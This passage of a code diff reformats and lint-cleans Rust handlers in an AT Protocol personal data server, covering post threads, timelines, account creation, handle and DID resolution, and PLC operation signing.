3
+
format_munged_response, get_local_lag, get_records_since_rev, proxy_to_appview,
4
4
};
5
5
use crate::state::AppState;
6
6
use axum::{
7
+
Json,
7
8
extract::{Query, State},
8
9
http::StatusCode,
9
10
response::{IntoResponse, Response},
10
-
Json,
11
11
};
12
12
use serde::{Deserialize, Serialize};
13
-
use serde_json::{json, Value};
13
+
use serde_json::{Value, json};
14
14
use std::collections::HashMap;
15
15
use tracing::warn;
16
16
···
39
39
#[derive(Debug, Clone, Serialize, Deserialize)]
40
40
#[serde(untagged)]
41
41
pub enum ThreadNode {
42
-
Post(ThreadViewPost),
42
+
Post(Box<ThreadViewPost>),
43
43
NotFound(ThreadNotFound),
44
44
Blocked(ThreadBlocked),
45
45
}
···
96
96
})
97
97
.map(|p| {
98
98
let post_view = format_local_post(p, author_did, author_handle, None);
99
-
ThreadNode::Post(ThreadViewPost {
99
+
ThreadNode::Post(Box::new(ThreadViewPost {
100
100
thread_type: Some("app.bsky.feed.defs#threadViewPost".to_string()),
101
101
post: post_view,
102
102
parent: None,
103
103
replies: None,
104
104
extra: HashMap::new(),
105
-
})
105
+
}))
106
106
})
107
107
.collect();
108
108
if !replies.is_empty() {
···
114
114
if let Some(ref mut existing_replies) = thread.replies {
115
115
for reply in existing_replies.iter_mut() {
116
116
if let ThreadNode::Post(reply_thread) = reply {
117
-
add_replies_to_thread(reply_thread, local_posts, author_did, author_handle, depth + 1);
117
+
add_replies_to_thread(
118
+
reply_thread,
119
+
local_posts,
120
+
author_did,
121
+
author_handle,
122
+
depth + 1,
123
+
);
118
124
}
119
125
}
120
126
}
···
128
134
let auth_header = headers.get("Authorization").and_then(|h| h.to_str().ok());
129
135
let auth_user = if let Some(h) = auth_header {
130
136
if let Some(token) = crate::auth::extract_bearer_token_from_header(Some(h)) {
131
-
crate::auth::validate_bearer_token(&state.db, &token).await.ok()
137
+
crate::auth::validate_bearer_token(&state.db, &token)
138
+
.await
139
+
.ok()
132
140
} else {
133
141
None
134
142
}
···
145
153
if let Some(parent_height) = params.parent_height {
146
154
query_params.insert("parentHeight".to_string(), parent_height.to_string());
147
155
}
148
-
let proxy_result =
149
-
match proxy_to_appview("app.bsky.feed.getPostThread", &query_params, auth_did.as_deref().unwrap_or(""), auth_key_bytes.as_deref()).await {
150
-
Ok(r) => r,
151
-
Err(e) => return e,
152
-
};
156
+
let proxy_result = match proxy_to_appview(
157
+
"app.bsky.feed.getPostThread",
158
+
&query_params,
159
+
auth_did.as_deref().unwrap_or(""),
160
+
auth_key_bytes.as_deref(),
161
+
)
162
+
.await
163
+
{
164
+
Ok(r) => r,
165
+
Err(e) => return e,
166
+
};
153
167
if proxy_result.status == StatusCode::NOT_FOUND {
154
168
return handle_not_found(&state, ¶ms.uri, auth_did, &proxy_result.headers).await;
155
169
}
···
193
207
}
194
208
};
195
209
if let ThreadNode::Post(ref mut thread_post) = thread_output.thread {
196
-
add_replies_to_thread(thread_post, &local_records.posts, &requester_did, &handle, 0);
210
+
add_replies_to_thread(
211
+
thread_post,
212
+
&local_records.posts,
213
+
&requester_did,
214
+
&handle,
215
+
0,
216
+
);
197
217
}
198
218
let lag = get_local_lag(&local_records);
199
219
format_munged_response(thread_output, lag)
···
212
232
StatusCode::NOT_FOUND,
213
233
Json(json!({"error": "NotFound", "message": "Post not found"})),
214
234
)
215
-
.into_response()
235
+
.into_response();
216
236
}
217
237
};
218
238
let requester_did = match auth_did {
···
222
242
StatusCode::NOT_FOUND,
223
243
Json(json!({"error": "NotFound", "message": "Post not found"})),
224
244
)
225
-
.into_response()
245
+
.into_response();
226
246
}
227
247
};
228
248
let uri_parts: Vec<&str> = uri.trim_start_matches("at://").split('/').collect();
···
248
268
StatusCode::NOT_FOUND,
249
269
Json(json!({"error": "NotFound", "message": "Post not found"})),
250
270
)
251
-
.into_response()
271
+
.into_response();
252
272
}
253
273
};
254
274
let local_post = local_records.posts.iter().find(|p| p.uri == uri);
···
259
279
StatusCode::NOT_FOUND,
260
280
Json(json!({"error": "NotFound", "message": "Post not found"})),
261
281
)
262
-
.into_response()
282
+
.into_response();
263
283
}
264
284
};
265
285
let handle = match sqlx::query_scalar!("SELECT handle FROM users WHERE did = $1", requester_did)
···
280
300
local_records.profile.as_ref(),
281
301
);
282
302
let thread = PostThreadOutput {
283
-
thread: ThreadNode::Post(ThreadViewPost {
303
+
thread: ThreadNode::Post(Box::new(ThreadViewPost {
284
304
thread_type: Some("app.bsky.feed.defs#threadViewPost".to_string()),
285
305
post: post_view,
286
306
parent: None,
287
307
replies: None,
288
308
extra: HashMap::new(),
289
-
}),
309
+
})),
290
310
threadgate: None,
291
311
};
292
312
let lag = get_local_lag(&local_records);
+45
-35
src/api/feed/timeline.rs
+45
-35
src/api/feed/timeline.rs
···
1
1
use crate::api::read_after_write::{
2
-
extract_repo_rev, format_local_post, format_munged_response, get_local_lag,
3
-
get_records_since_rev, insert_posts_into_feed, proxy_to_appview, FeedOutput, FeedViewPost,
4
-
PostView,
2
+
FeedOutput, FeedViewPost, PostView, extract_repo_rev, format_local_post,
3
+
format_munged_response, get_local_lag, get_records_since_rev, insert_posts_into_feed,
4
+
proxy_to_appview,
5
5
};
6
6
use crate::state::AppState;
7
7
use axum::{
8
+
Json,
8
9
extract::{Query, State},
9
10
http::StatusCode,
10
11
response::{IntoResponse, Response},
11
-
Json,
12
12
};
13
13
use jacquard_repo::storage::BlockStore;
14
14
use serde::Deserialize;
15
-
use serde_json::{json, Value};
15
+
use serde_json::{Value, json};
16
16
use std::collections::HashMap;
17
17
use tracing::warn;
18
18
···
52
52
};
53
53
match std::env::var("APPVIEW_URL") {
54
54
Ok(url) if !url.starts_with("http://127.0.0.1") => {
55
-
return get_timeline_with_appview(&state, ¶ms, &auth_user.did, auth_user.key_bytes.as_deref()).await;
55
+
return get_timeline_with_appview(
56
+
&state,
57
+
¶ms,
58
+
&auth_user.did,
59
+
auth_user.key_bytes.as_deref(),
60
+
)
61
+
.await;
56
62
}
57
63
_ => {}
58
64
}
···
75
81
if let Some(cursor) = ¶ms.cursor {
76
82
query_params.insert("cursor".to_string(), cursor.clone());
77
83
}
78
-
let proxy_result =
79
-
match proxy_to_appview("app.bsky.feed.getTimeline", &query_params, auth_did, auth_key_bytes).await {
80
-
Ok(r) => r,
81
-
Err(e) => return e,
82
-
};
84
+
let proxy_result = match proxy_to_appview(
85
+
"app.bsky.feed.getTimeline",
86
+
&query_params,
87
+
auth_did,
88
+
auth_key_bytes,
89
+
)
90
+
.await
91
+
{
92
+
Ok(r) => r,
93
+
Err(e) => return e,
94
+
};
83
95
if !proxy_result.status.is_success() {
84
96
return proxy_result.into_response();
85
97
}
···
127
139
}
128
140
129
141
async fn get_timeline_local_only(state: &AppState, auth_did: &str) -> Response {
130
-
let user_id: uuid::Uuid = match sqlx::query_scalar!(
131
-
"SELECT id FROM users WHERE did = $1",
132
-
auth_did
133
-
)
134
-
.fetch_optional(&state.db)
135
-
.await
136
-
{
137
-
Ok(Some(id)) => id,
138
-
Ok(None) => {
139
-
return (
140
-
StatusCode::INTERNAL_SERVER_ERROR,
141
-
Json(json!({"error": "InternalError", "message": "User not found"})),
142
-
)
143
-
.into_response();
144
-
}
145
-
Err(e) => {
146
-
warn!("Database error fetching user: {:?}", e);
147
-
return (
148
-
StatusCode::INTERNAL_SERVER_ERROR,
149
-
Json(json!({"error": "InternalError", "message": "Database error"})),
150
-
)
151
-
.into_response();
152
-
}
153
-
};
142
+
let user_id: uuid::Uuid =
143
+
match sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", auth_did)
144
+
.fetch_optional(&state.db)
145
+
.await
146
+
{
147
+
Ok(Some(id)) => id,
148
+
Ok(None) => {
149
+
return (
150
+
StatusCode::INTERNAL_SERVER_ERROR,
151
+
Json(json!({"error": "InternalError", "message": "User not found"})),
152
+
)
153
+
.into_response();
154
+
}
155
+
Err(e) => {
156
+
warn!("Database error fetching user: {:?}", e);
157
+
return (
158
+
StatusCode::INTERNAL_SERVER_ERROR,
159
+
Json(json!({"error": "InternalError", "message": "Database error"})),
160
+
)
161
+
.into_response();
162
+
}
163
+
};
154
164
let follows_query = sqlx::query!(
155
165
"SELECT record_cid FROM records WHERE repo_id = $1 AND collection = 'app.bsky.graph.follow' LIMIT 5000",
156
166
user_id
+91
-48
src/api/identity/account.rs
+91
-48
src/api/identity/account.rs
···
1
1
use super::did::verify_did_web;
2
-
use crate::plc::{create_genesis_operation, signing_key_to_did_key, PlcClient};
2
+
use crate::plc::{PlcClient, create_genesis_operation, signing_key_to_did_key};
3
3
use crate::state::{AppState, RateLimitKind};
4
4
use axum::{
5
5
Json,
···
10
10
use bcrypt::{DEFAULT_COST, hash};
11
11
use jacquard::types::{did::Did, integer::LimitedU32, string::Tid};
12
12
use jacquard_repo::{commit::Commit, mst::Mst, storage::BlockStore};
13
-
use k256::{ecdsa::SigningKey, SecretKey};
13
+
use k256::{SecretKey, ecdsa::SigningKey};
14
14
use rand::rngs::OsRng;
15
15
use serde::{Deserialize, Serialize};
16
16
use serde_json::json;
···
18
18
use tracing::{error, info, warn};
19
19
20
20
fn extract_client_ip(headers: &HeaderMap) -> String {
21
-
if let Some(forwarded) = headers.get("x-forwarded-for") {
22
-
if let Ok(value) = forwarded.to_str() {
23
-
if let Some(first_ip) = value.split(',').next() {
21
+
if let Some(forwarded) = headers.get("x-forwarded-for")
22
+
&& let Ok(value) = forwarded.to_str()
23
+
&& let Some(first_ip) = value.split(',').next() {
24
24
return first_ip.trim().to_string();
25
25
}
26
-
}
27
-
}
28
-
if let Some(real_ip) = headers.get("x-real-ip") {
29
-
if let Ok(value) = real_ip.to_str() {
26
+
if let Some(real_ip) = headers.get("x-real-ip")
27
+
&& let Ok(value) = real_ip.to_str() {
30
28
return value.trim().to_string();
31
29
}
32
-
}
33
30
"unknown".to_string()
34
31
}
35
32
···
64
61
) -> Response {
65
62
info!("create_account called");
66
63
let client_ip = extract_client_ip(&headers);
67
-
if !state.check_rate_limit(RateLimitKind::AccountCreation, &client_ip).await {
64
+
if !state
65
+
.check_rate_limit(RateLimitKind::AccountCreation, &client_ip)
66
+
.await
67
+
{
68
68
warn!(ip = %client_ip, "Account creation rate limit exceeded");
69
69
return (
70
70
StatusCode::TOO_MANY_REQUESTS,
···
84
84
)
85
85
.into_response();
86
86
}
87
-
let email: Option<String> = input.email.as_ref()
87
+
let email: Option<String> = input
88
+
.email
89
+
.as_ref()
88
90
.map(|e| e.trim().to_string())
89
91
.filter(|e| !e.is_empty());
90
-
if let Some(ref email) = email {
91
-
if !crate::api::validation::is_valid_email(email) {
92
+
if let Some(ref email) = email
93
+
&& !crate::api::validation::is_valid_email(email) {
92
94
return (
93
95
StatusCode::BAD_REQUEST,
94
96
Json(json!({"error": "InvalidEmail", "message": "Invalid email format"})),
95
97
)
96
98
.into_response();
97
99
}
98
-
}
99
100
let verification_channel = input.verification_channel.as_deref().unwrap_or("email");
100
101
let valid_channels = ["email", "discord", "telegram", "signal"];
101
102
if !valid_channels.contains(&verification_channel) {
···
220
221
}
221
222
};
222
223
let plc_client = PlcClient::new(None);
223
-
if let Err(e) = plc_client.send_operation(&genesis_result.did, &genesis_result.signed_operation).await {
224
+
if let Err(e) = plc_client
225
+
.send_operation(&genesis_result.did, &genesis_result.signed_operation)
226
+
.await
227
+
{
224
228
error!("Failed to submit PLC genesis operation: {:?}", e);
225
229
return (
226
230
StatusCode::BAD_GATEWAY,
···
269
273
}
270
274
};
271
275
let plc_client = PlcClient::new(None);
272
-
if let Err(e) = plc_client.send_operation(&genesis_result.did, &genesis_result.signed_operation).await {
276
+
if let Err(e) = plc_client
277
+
.send_operation(&genesis_result.did, &genesis_result.signed_operation)
278
+
.await
279
+
{
273
280
error!("Failed to submit PLC genesis operation: {:?}", e);
274
281
return (
275
282
StatusCode::BAD_GATEWAY,
···
316
323
Ok(None) => {}
317
324
}
318
325
if let Some(code) = &input.invite_code {
319
-
let invite_query =
320
-
sqlx::query!("SELECT available_uses FROM invite_codes WHERE code = $1 FOR UPDATE", code)
321
-
.fetch_optional(&mut *tx)
322
-
.await;
326
+
let invite_query = sqlx::query!(
327
+
"SELECT available_uses FROM invite_codes WHERE code = $1 FOR UPDATE",
328
+
code
329
+
)
330
+
.fetch_optional(&mut *tx)
331
+
.await;
323
332
match invite_query {
324
333
Ok(Some(row)) => {
325
334
if row.available_uses <= 0 {
···
378
387
discord_id, telegram_username, signal_number
379
388
) VALUES ($1, $2, $3, $4, $5, $6, $7::notification_channel, $8, $9, $10) RETURNING id"#,
380
389
)
381
-
.bind(short_handle)
382
-
.bind(&email)
383
-
.bind(&did)
384
-
.bind(&password_hash)
385
-
.bind(&verification_code)
386
-
.bind(&code_expires_at)
387
-
.bind(verification_channel)
388
-
.bind(input.discord_id.as_deref().map(|s| s.trim()).filter(|s| !s.is_empty()))
389
-
.bind(input.telegram_username.as_deref().map(|s| s.trim()).filter(|s| !s.is_empty()))
390
-
.bind(input.signal_number.as_deref().map(|s| s.trim()).filter(|s| !s.is_empty()))
391
-
.fetch_one(&mut *tx)
392
-
.await;
390
+
.bind(short_handle)
391
+
.bind(&email)
392
+
.bind(&did)
393
+
.bind(&password_hash)
394
+
.bind(&verification_code)
395
+
.bind(code_expires_at)
396
+
.bind(verification_channel)
397
+
.bind(
398
+
input
399
+
.discord_id
400
+
.as_deref()
401
+
.map(|s| s.trim())
402
+
.filter(|s| !s.is_empty()),
403
+
)
404
+
.bind(
405
+
input
406
+
.telegram_username
407
+
.as_deref()
408
+
.map(|s| s.trim())
409
+
.filter(|s| !s.is_empty()),
410
+
)
411
+
.bind(
412
+
input
413
+
.signal_number
414
+
.as_deref()
415
+
.map(|s| s.trim())
416
+
.filter(|s| !s.is_empty()),
417
+
)
418
+
.fetch_one(&mut *tx)
419
+
.await;
393
420
let user_id = match user_insert {
394
421
Ok((id,)) => id,
395
422
Err(e) => {
396
-
if let Some(db_err) = e.as_database_error() {
397
-
if db_err.code().as_deref() == Some("23505") {
423
+
if let Some(db_err) = e.as_database_error()
424
+
&& db_err.code().as_deref() == Some("23505") {
398
425
let constraint = db_err.constraint().unwrap_or("");
399
426
if constraint.contains("handle") || constraint.contains("users_handle") {
400
427
return (
···
425
452
.into_response();
426
453
}
427
454
}
428
-
}
429
455
error!("Error inserting user: {:?}", e);
430
456
return (
431
457
StatusCode::INTERNAL_SERVER_ERROR,
···
535
561
}
536
562
};
537
563
let commit_cid_str = commit_cid.to_string();
538
-
let repo_insert = sqlx::query!("INSERT INTO repos (user_id, repo_root_cid) VALUES ($1, $2)", user_id, commit_cid_str)
539
-
.execute(&mut *tx)
540
-
.await;
564
+
let repo_insert = sqlx::query!(
565
+
"INSERT INTO repos (user_id, repo_root_cid) VALUES ($1, $2)",
566
+
user_id,
567
+
commit_cid_str
568
+
)
569
+
.execute(&mut *tx)
570
+
.await;
541
571
if let Err(e) = repo_insert {
542
572
error!("Error initializing repo: {:?}", e);
543
573
return (
···
547
577
.into_response();
548
578
}
549
579
if let Some(code) = &input.invite_code {
550
-
let use_insert =
551
-
sqlx::query!("INSERT INTO invite_code_uses (code, used_by_user) VALUES ($1, $2)", code, user_id)
552
-
.execute(&mut *tx)
553
-
.await;
580
+
let use_insert = sqlx::query!(
581
+
"INSERT INTO invite_code_uses (code, used_by_user) VALUES ($1, $2)",
582
+
code,
583
+
user_id
584
+
)
585
+
.execute(&mut *tx)
586
+
.await;
554
587
if let Err(e) = use_insert {
555
588
error!("Error recording invite usage: {:?}", e);
556
589
return (
···
568
601
)
569
602
.into_response();
570
603
}
571
-
if let Err(e) = crate::api::repo::record::sequence_identity_event(&state, &did, Some(&full_handle)).await {
604
+
if let Err(e) =
605
+
crate::api::repo::record::sequence_identity_event(&state, &did, Some(&full_handle)).await
606
+
{
572
607
warn!("Failed to sequence identity event for {}: {}", did, e);
573
608
}
574
-
if let Err(e) = crate::api::repo::record::sequence_account_event(&state, &did, true, None).await {
609
+
if let Err(e) = crate::api::repo::record::sequence_account_event(&state, &did, true, None).await
610
+
{
575
611
warn!("Failed to sequence account event for {}: {}", did, e);
576
612
}
577
613
let profile_record = json!({
···
584
620
"app.bsky.actor.profile",
585
621
"self",
586
622
&profile_record,
587
-
).await {
623
+
)
624
+
.await
625
+
{
588
626
warn!("Failed to create default profile for {}: {}", did, e);
589
627
}
590
628
if let Err(e) = crate::notifications::enqueue_signup_verification(
···
593
631
verification_channel,
594
632
&verification_recipient,
595
633
&verification_code,
596
-
).await {
597
-
warn!("Failed to enqueue signup verification notification: {:?}", e);
634
+
)
635
+
.await
636
+
{
637
+
warn!(
638
+
"Failed to enqueue signup verification notification: {:?}",
639
+
e
640
+
);
598
641
}
599
642
(
600
643
StatusCode::OK,
+57
-34
src/api/identity/did.rs
+57
-34
src/api/identity/did.rs
···
47
47
.await;
48
48
match user {
49
49
Ok(Some(row)) => {
50
-
let _ = state.cache.set(&cache_key, &row.did, std::time::Duration::from_secs(300)).await;
50
+
let _ = state
51
+
.cache
52
+
.set(&cache_key, &row.did, std::time::Duration::from_secs(300))
53
+
.await;
51
54
(StatusCode::OK, Json(json!({ "did": row.did }))).into_response()
52
55
}
53
56
Ok(None) => (
···
127
130
)
128
131
.into_response();
129
132
}
130
-
let key_row = sqlx::query!("SELECT key_bytes, encryption_version FROM user_keys WHERE user_id = $1", user_id)
131
-
.fetch_optional(&state.db)
132
-
.await;
133
+
let key_row = sqlx::query!(
134
+
"SELECT key_bytes, encryption_version FROM user_keys WHERE user_id = $1",
135
+
user_id
136
+
)
137
+
.fetch_optional(&state.db)
138
+
.await;
133
139
let key_bytes: Vec<u8> = match key_row {
134
-
Ok(Some(row)) => {
135
-
match crate::config::decrypt_key(&row.key_bytes, row.encryption_version) {
136
-
Ok(k) => k,
137
-
Err(_) => {
138
-
return (
139
-
StatusCode::INTERNAL_SERVER_ERROR,
140
-
Json(json!({"error": "InternalError"})),
141
-
)
142
-
.into_response();
143
-
}
140
+
Ok(Some(row)) => match crate::config::decrypt_key(&row.key_bytes, row.encryption_version) {
141
+
Ok(k) => k,
142
+
Err(_) => {
143
+
return (
144
+
StatusCode::INTERNAL_SERVER_ERROR,
145
+
Json(json!({"error": "InternalError"})),
146
+
)
147
+
.into_response();
144
148
}
145
-
}
149
+
},
146
150
_ => {
147
151
return (
148
152
StatusCode::INTERNAL_SERVER_ERROR,
···
283
287
headers: axum::http::HeaderMap,
284
288
) -> Response {
285
289
let token = match crate::auth::extract_bearer_token_from_header(
286
-
headers.get("Authorization").and_then(|h| h.to_str().ok())
290
+
headers.get("Authorization").and_then(|h| h.to_str().ok()),
287
291
) {
288
292
Some(t) => t,
289
293
None => {
···
298
302
Ok(user) => user,
299
303
Err(e) => return ApiError::from(e).into_response(),
300
304
};
301
-
let user = match sqlx::query!("SELECT handle FROM users u JOIN user_keys k ON u.id = k.user_id WHERE u.did = $1", auth_user.did)
302
-
.fetch_optional(&state.db)
303
-
.await
305
+
let user = match sqlx::query!(
306
+
"SELECT handle FROM users u JOIN user_keys k ON u.id = k.user_id WHERE u.did = $1",
307
+
auth_user.did
308
+
)
309
+
.fetch_optional(&state.db)
310
+
.await
304
311
{
305
312
Ok(Some(row)) => row,
306
313
_ => return ApiError::InternalError.into_response(),
307
314
};
308
315
let key_bytes = match auth_user.key_bytes {
309
316
Some(kb) => kb,
310
-
None => return ApiError::AuthenticationFailedMsg("OAuth tokens cannot get DID credentials".into()).into_response(),
317
+
None => {
318
+
return ApiError::AuthenticationFailedMsg(
319
+
"OAuth tokens cannot get DID credentials".into(),
320
+
)
321
+
.into_response();
322
+
}
311
323
};
312
324
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
313
325
let pds_endpoint = format!("https://{}", hostname);
···
352
364
Json(input): Json<UpdateHandleInput>,
353
365
) -> Response {
354
366
let token = match crate::auth::extract_bearer_token_from_header(
355
-
headers.get("Authorization").and_then(|h| h.to_str().ok())
367
+
headers.get("Authorization").and_then(|h| h.to_str().ok()),
356
368
) {
357
369
Some(t) => t,
358
370
None => return ApiError::AuthenticationRequired.into_response(),
···
378
390
{
379
391
return (
380
392
StatusCode::BAD_REQUEST,
381
-
Json(json!({"error": "InvalidHandle", "message": "Handle contains invalid characters"})),
393
+
Json(
394
+
json!({"error": "InvalidHandle", "message": "Handle contains invalid characters"}),
395
+
),
382
396
)
383
397
.into_response();
384
398
}
···
387
401
.await
388
402
.ok()
389
403
.flatten();
390
-
let existing = sqlx::query!("SELECT id FROM users WHERE handle = $1 AND id != $2", new_handle, user_id)
391
-
.fetch_optional(&state.db)
392
-
.await;
404
+
let existing = sqlx::query!(
405
+
"SELECT id FROM users WHERE handle = $1 AND id != $2",
406
+
new_handle,
407
+
user_id
408
+
)
409
+
.fetch_optional(&state.db)
410
+
.await;
393
411
if let Ok(Some(_)) = existing {
394
412
return (
395
413
StatusCode::BAD_REQUEST,
···
397
415
)
398
416
.into_response();
399
417
}
400
-
let result = sqlx::query!("UPDATE users SET handle = $1 WHERE id = $2", new_handle, user_id)
401
-
.execute(&state.db)
402
-
.await;
418
+
let result = sqlx::query!(
419
+
"UPDATE users SET handle = $1 WHERE id = $2",
420
+
new_handle,
421
+
user_id
422
+
)
423
+
.execute(&state.db)
424
+
.await;
403
425
match result {
404
426
Ok(_) => {
405
427
if let Some(old) = old_handle {
406
428
let _ = state.cache.delete(&format!("handle:{}", old)).await;
407
429
}
408
430
let _ = state.cache.delete(&format!("handle:{}", new_handle)).await;
409
-
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
431
+
let hostname =
432
+
std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
410
433
let full_handle = format!("{}.{}", new_handle, hostname);
411
-
if let Err(e) = crate::api::repo::record::sequence_identity_event(&state, &did, Some(&full_handle)).await {
434
+
if let Err(e) =
435
+
crate::api::repo::record::sequence_identity_event(&state, &did, Some(&full_handle))
436
+
.await
437
+
{
412
438
warn!("Failed to sequence identity event for handle update: {}", e);
413
439
}
414
440
(StatusCode::OK, Json(json!({}))).into_response()
···
424
450
}
425
451
}
426
452
427
-
pub async fn well_known_atproto_did(
428
-
State(state): State<AppState>,
429
-
headers: HeaderMap,
430
-
) -> Response {
453
+
pub async fn well_known_atproto_did(State(state): State<AppState>, headers: HeaderMap) -> Response {
431
454
let host = match headers.get("host").and_then(|h| h.to_str().ok()) {
432
455
Some(h) => h,
433
456
None => return (StatusCode::BAD_REQUEST, "Missing host header").into_response(),
+2
-2
src/api/identity/mod.rs
+2
-2
src/api/identity/mod.rs
···
4
4
5
5
pub use account::create_account;
6
6
pub use did::{
7
-
get_recommended_did_credentials, resolve_handle, update_handle, user_did_doc, well_known_did,
8
-
well_known_atproto_did,
7
+
get_recommended_did_credentials, resolve_handle, update_handle, user_did_doc,
8
+
well_known_atproto_did, well_known_did,
9
9
};
10
10
pub use plc::{request_plc_operation_signature, sign_plc_operation, submit_plc_operation};
+2
-2
src/api/identity/plc/mod.rs
+2
-2
src/api/identity/plc/mod.rs
···
3
3
mod submit;
4
4
5
5
pub use request::request_plc_operation_signature;
6
-
pub use sign::{sign_plc_operation, ServiceInput, SignPlcOperationInput, SignPlcOperationOutput};
7
-
pub use submit::{submit_plc_operation, SubmitPlcOperationInput};
6
+
pub use sign::{ServiceInput, SignPlcOperationInput, SignPlcOperationOutput, sign_plc_operation};
7
+
pub use submit::{SubmitPlcOperationInput, submit_plc_operation};
+7
-9
src/api/identity/plc/request.rs
+7
-9
src/api/identity/plc/request.rs
···
1
1
use crate::api::ApiError;
2
2
use crate::state::AppState;
3
3
use axum::{
4
+
Json,
4
5
extract::State,
5
6
http::StatusCode,
6
7
response::{IntoResponse, Response},
7
-
Json,
8
8
};
9
9
use chrono::{Duration, Utc};
10
10
use serde_json::json;
···
67
67
.into_response();
68
68
}
69
69
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
70
-
if let Err(e) = crate::notifications::enqueue_plc_operation(
71
-
&state.db,
72
-
user.id,
73
-
&plc_token,
74
-
&hostname,
75
-
)
76
-
.await
70
+
if let Err(e) =
71
+
crate::notifications::enqueue_plc_operation(&state.db, user.id, &plc_token, &hostname).await
77
72
{
78
73
warn!("Failed to enqueue PLC operation notification: {:?}", e);
79
74
}
80
-
info!("PLC operation signature requested for user {}", auth_user.did);
75
+
info!(
76
+
"PLC operation signature requested for user {}",
77
+
auth_user.did
78
+
);
81
79
(StatusCode::OK, Json(json!({}))).into_response()
82
80
}
+24
-17
src/api/identity/plc/sign.rs
+24
-17
src/api/identity/plc/sign.rs
···
1
1
use crate::api::ApiError;
2
-
use crate::circuit_breaker::{with_circuit_breaker, CircuitBreakerError};
2
+
use crate::circuit_breaker::{CircuitBreakerError, with_circuit_breaker};
3
3
use crate::plc::{
4
-
create_update_op, sign_operation, PlcClient, PlcError, PlcOpOrTombstone, PlcService,
4
+
PlcClient, PlcError, PlcOpOrTombstone, PlcService, create_update_op, sign_operation,
5
5
};
6
6
use crate::state::AppState;
7
7
use axum::{
8
+
Json,
8
9
extract::State,
9
10
http::StatusCode,
10
11
response::{IntoResponse, Response},
11
-
Json,
12
12
};
13
13
use chrono::Utc;
14
14
use k256::ecdsa::SigningKey;
15
15
use serde::{Deserialize, Serialize};
16
-
use serde_json::{json, Value};
16
+
use serde_json::{Value, json};
17
17
use std::collections::HashMap;
18
18
use tracing::{error, info, warn};
19
19
···
59
59
Some(t) => t,
60
60
None => {
61
61
return ApiError::InvalidRequest(
62
-
"Email confirmation token required to sign PLC operations".into()
63
-
).into_response();
62
+
"Email confirmation token required to sign PLC operations".into(),
63
+
)
64
+
.into_response();
64
65
}
65
66
};
66
67
let user = match sqlx::query!("SELECT id FROM users WHERE did = $1", did)
···
105
106
}
106
107
};
107
108
if Utc::now() > token_row.expires_at {
108
-
let _ = sqlx::query!("DELETE FROM plc_operation_tokens WHERE id = $1", token_row.id)
109
-
.execute(&state.db)
110
-
.await;
109
+
let _ = sqlx::query!(
110
+
"DELETE FROM plc_operation_tokens WHERE id = $1",
111
+
token_row.id
112
+
)
113
+
.execute(&state.db)
114
+
.await;
111
115
return (
112
116
StatusCode::BAD_REQUEST,
113
117
Json(json!({
···
158
162
};
159
163
let plc_client = PlcClient::new(None);
160
164
let did_clone = did.clone();
161
-
let result: Result<PlcOpOrTombstone, CircuitBreakerError<PlcError>> = with_circuit_breaker(
162
-
&state.circuit_breakers.plc_directory,
163
-
|| async { plc_client.get_last_op(&did_clone).await },
164
-
)
165
-
.await;
165
+
let result: Result<PlcOpOrTombstone, CircuitBreakerError<PlcError>> =
166
+
with_circuit_breaker(&state.circuit_breakers.plc_directory, || async {
167
+
plc_client.get_last_op(&did_clone).await
168
+
})
169
+
.await;
166
170
let last_op = match result {
167
171
Ok(op) => op,
168
172
Err(CircuitBreakerError::CircuitOpen(e)) => {
···
259
263
.into_response();
260
264
}
261
265
};
262
-
let _ = sqlx::query!("DELETE FROM plc_operation_tokens WHERE id = $1", token_row.id)
263
-
.execute(&state.db)
264
-
.await;
266
+
let _ = sqlx::query!(
267
+
"DELETE FROM plc_operation_tokens WHERE id = $1",
268
+
token_row.id
269
+
)
270
+
.execute(&state.db)
271
+
.await;
265
272
info!("Signed PLC operation for user {}", did);
266
273
(
267
274
StatusCode::OK,
+16
-17
src/api/identity/plc/submit.rs
+16
-17
src/api/identity/plc/submit.rs
···
1
1
use crate::api::ApiError;
2
-
use crate::circuit_breaker::{with_circuit_breaker, CircuitBreakerError};
3
-
use crate::plc::{signing_key_to_did_key, validate_plc_operation, PlcClient, PlcError};
2
+
use crate::circuit_breaker::{CircuitBreakerError, with_circuit_breaker};
3
+
use crate::plc::{PlcClient, PlcError, signing_key_to_did_key, validate_plc_operation};
4
4
use crate::state::AppState;
5
5
use axum::{
6
+
Json,
6
7
extract::State,
7
8
http::StatusCode,
8
9
response::{IntoResponse, Response},
9
-
Json,
10
10
};
11
11
use k256::ecdsa::SigningKey;
12
12
use serde::Deserialize;
13
-
use serde_json::{json, Value};
13
+
use serde_json::{Value, json};
14
14
use tracing::{error, info, warn};
15
15
16
16
#[derive(Debug, Deserialize)]
···
110
110
.into_response();
111
111
}
112
112
}
113
-
if let Some(services) = op.get("services").and_then(|v| v.as_object()) {
114
-
if let Some(pds) = services.get("atproto_pds").and_then(|v| v.as_object()) {
113
+
if let Some(services) = op.get("services").and_then(|v| v.as_object())
114
+
&& let Some(pds) = services.get("atproto_pds").and_then(|v| v.as_object()) {
115
115
let service_type = pds.get("type").and_then(|v| v.as_str());
116
116
let endpoint = pds.get("endpoint").and_then(|v| v.as_str());
117
117
if service_type != Some("AtprotoPersonalDataServer") {
···
135
135
.into_response();
136
136
}
137
137
}
138
-
}
139
-
if let Some(verification_methods) = op.get("verificationMethods").and_then(|v| v.as_object()) {
140
-
if let Some(atproto_key) = verification_methods.get("atproto").and_then(|v| v.as_str()) {
141
-
if atproto_key != user_did_key {
138
+
if let Some(verification_methods) = op.get("verificationMethods").and_then(|v| v.as_object())
139
+
&& let Some(atproto_key) = verification_methods.get("atproto").and_then(|v| v.as_str())
140
+
&& atproto_key != user_did_key {
142
141
return (
143
142
StatusCode::BAD_REQUEST,
144
143
Json(json!({
···
148
147
)
149
148
.into_response();
150
149
}
151
-
}
152
-
}
153
150
if let Some(also_known_as) = op.get("alsoKnownAs").and_then(|v| v.as_array()) {
154
151
let expected_handle = format!("at://{}", user.handle);
155
152
let first_aka = also_known_as.first().and_then(|v| v.as_str());
···
167
164
let plc_client = PlcClient::new(None);
168
165
let operation_clone = input.operation.clone();
169
166
let did_clone = did.clone();
170
-
